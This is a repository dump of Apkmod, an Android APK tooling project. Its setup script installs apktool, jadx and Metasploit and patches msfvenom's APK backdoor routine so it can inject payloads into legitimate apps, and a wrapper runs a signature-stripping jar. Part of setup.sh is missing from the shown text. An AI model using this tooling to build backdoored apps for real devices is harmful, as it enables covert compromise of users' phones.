comnd="signapk $args" 5 | exec proot --link2symlink -0 -r ${PREFIX}/share/apkmod/ -b /dev/ -b /sys/ -b /proc/ -b /sdcard -b /storage -b ${HOME} -b ${TMPDIR} -b ${PREFIX}/share -w $HOME /usr/bin/env HOME=/root PREFIX=/usr SHELL=/bin/sh TERM="$TERM" LANG=$LANG PATH=/bin:/usr/bin:/sbin:/usr/sbin LD_LIBRARY_PATH=/usr/lib /bin/sh --login -c "$comnd" 6 | -------------------------------------------------------------------------------- /scripts/signkill.sh: -------------------------------------------------------------------------------- 1 | #!/data/data/com.termux/files/usr/bin/sh 2 | 3 | dalvikvm -cp $HOME/.apkmod/signkill.jar com.hax4us.signkill.Main "$@" 4 | -------------------------------------------------------------------------------- /setup.sh: -------------------------------------------------------------------------------- 1 | #!/data/data/com.termux/files/usr/bin/bash 2 | 3 | #colors 4 | red='\033[1;31m' 5 | yellow='\033[1;33m' 6 | reset='\033[0m' 7 | 8 | ALPINEDIR="${PREFIX}/share/apkmod" 9 | BINDIR="${PREFIX}/bin" 10 | LIBDIR="${ALPINEDIR}/usr/lib" 11 | 12 | APKTOOL_VERSION="2.6.1" 13 | APKTOOL_URL="https://github.com/Hax4us/Apkmod/releases/download/v${APKTOOL_VERSION}/apktool-${APKTOOL_VERSION}.apk" 14 | 15 | JADX_VERSION="1.3.2" 16 | JADX_URL=https://github.com/skylot/jadx/releases/download/v${JADX_VERSION}/jadx-${JADX_VERSION}.zip 17 | 18 | AAPT_URL="https://github.com/Hax4us/Apkmod/releases/download/v${APKTOOL_VERSION}/aapt_@ARCH@.tar.gz" 19 | 20 | 21 | detect_os() { 22 | if [ -e $BINDIR/termux-info ]; then 23 | OS=TERMUX 24 | #AAPT="-a /usr/bin/aapt2" 25 | else 26 | grep kali /etc/os-release > /dev/null 2>&1 27 | if [ $? -eq 0 ]; then 28 | OS=KALI 29 | AAPT="--use-aapt2" 30 | else 31 | printf "${red}[!] ${yellow}Unsupported system\n" 32 | exit 1 33 | fi 34 | fi 35 | } 36 | 37 | install_deps_kali() { 38 | printf "[*] Installing dependencies...\n" 39 | apt-get install metasploit-framework bc apktool default-jdk -y > /dev/null 40 | wget https://github.com/hax4us/Apkmod/raw/master/apkmod.sh -O $PREFIX/bin/apkmod && chmod +x $PREFIX/bin/apkmod 41 | printf "[*] Done\n" 42 | } 43 | 44 | setup_alpine() { 45 | if [ ! "$1" = "--without-alpine" ]; then 46 | wget https://raw.githubusercontent.com/Hax4us/Apkmod/master/scripts/TermuxAlpine.sh -O TermuxAlpine.sh 47 | bash TermuxAlpine.sh 48 | fi 49 | mkdir -p ${ALPINEDIR}/root/.bind 50 | cat < /dev/null 135 | if [ $? -ne 0 ]; then 136 | line_num=$(busybox grep -n "help" msfvenom | cut -d ":" -f1) 137 | line_num=$((${line_num}-1)) 138 | busybox awk -v "n=${line_num}" -v "s=\n\topt.on('--use-aapt','Use aapt for recompiling') do\n\t\topts[:use_aapt] = true\n\tend" '(NR==n) { print s } 1' msfvenom.orig > msfvenom 139 | if [ $? -eq 0 ]; then 140 | printf "#patched" >> msfvenom 141 | else 142 | printf "${red}[!] can't patch msfvenom\n${reset}" 143 | exit 1 144 | fi 145 | fi 146 | busybox grep "#patched" lib/msf/core/payload_generator.rb > /dev/null 147 | if [ $? -ne 0 ]; then 148 | line_num=$(busybox grep -n ":add_code" lib/msf/core/payload_generator.rb | head -n1 | cut -d ":" -f1) 149 | line_num=$((${line_num}-2)) 150 | busybox awk -v "n=${line_num}" -v "s=\t# @\!attribute use_aapt\n\t# @return [String] use aapt or not\n\tattr_accessor :use_aapt" '(NR==n) { print s } 1' lib/msf/core/payload_generator.rb.orig > lib/msf/core/payload_generator.rb 151 | if [ $? -ne 0 ]; then 152 | printf "${red}[!] can't patch payload_generator.rb\n${reset}" 153 | exit 1 154 | fi 155 | line_num=$(busybox grep -n "@framework" lib/msf/core/payload_generator.rb | head -n1 | cut -d ":" -f1) 156 | line_num=$((${line_num}-2)) 157 | busybox sed -i "${line_num}s/.*/\t@use_aapt = opts.fetch(:use_aapt,false)/" lib/msf/core/payload_generator.rb 158 | if [ $? -ne 0 ]; then 159 | printf "${red}[!] can't patch payload_genereator.rb\n${reset}" 160 | exit 1 161 | fi 162 | line_num=$(busybox grep -n "apk_backdoor.backdoor_apk" lib/msf/core/payload_generator.rb | cut -d ":" -f1) 163 | busybox sed -i "${line_num}s/.*/\t\traw_payload = apk_backdoor.backdoor_apk(template, generate_raw_payload, use_aapt)/" lib/msf/core/payload_generator.rb 164 | if [ $? -eq 0 ]; then 165 | printf "#patched" >> lib/msf/core/payload_generator.rb 166 | else 167 | printf "${red}[!] can't patch payload_generator.rb\n${reset}" 168 | exit 1 169 | fi 170 | fi 171 | 172 | #sed -i "s#AAPT=.*#AAPT=\"$AAPT\"#" $BINDIR/apkmod 173 | if [ $OS = "KALI" ]; then 174 | sed -i "s#AAPT=.*#AAPT=\"$AAPT\"#" $BINDIR/apkmod 175 | sed -i s/"apktool b"/"apktool b --use-aapt2"/g /usr/share/metasploit-framework/lib/msf/core/payload/apk.rb 176 | fi 177 | } 178 | 179 | jadx() { 180 | wget ${JADX_URL} 181 | mkdir -p ${ALPINEDIR}/usr/lib/jadx 182 | unzip jadx-${JADX_VERSION}.zip -d ${ALPINEDIR}/usr/lib/jadx 183 | } 184 | 185 | ################## 186 | # MAIN DRIVER # 187 | ################## 188 | 189 | detect_os 190 | 191 | if [ $OS = "TERMUX" ]; then 192 | termux-wake-lock 193 | # Temporary check for alpine version 194 | # so that if user has already installed 195 | # TermuxAlpine then check if this alpine 196 | # was installed by apkmod or not. 197 | #if [ -d $PREFIX/share/TermuxAlpine ]; then 198 | # if [ "$(cat $PREFIX/share/TermuxAlpine/etc/alpine-release)" = "3.10.2" ]; then 199 | # mv $PREFIX/share/TermuxAlpine $ALPINEDIR 200 | # fi 201 | #fi 202 | 203 | setup_alpine "$1" 204 | install_deps 205 | install_scripts 206 | jadx 207 | termux-wake-unlock 208 | if [ ! "$HAS_METASPLOIT" = "no" ]; then 209 | do_patches 210 | fi 211 | else 212 | install_deps_kali 213 | do_patches_kali 214 | fi 215 | -------------------------------------------------------------------------------- /signkill.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hax4us/Apkmod/42d3aaac87dce9d3285150172acf2e75a02d7a2f/signkill.jar --------------------------------------------------------------------------------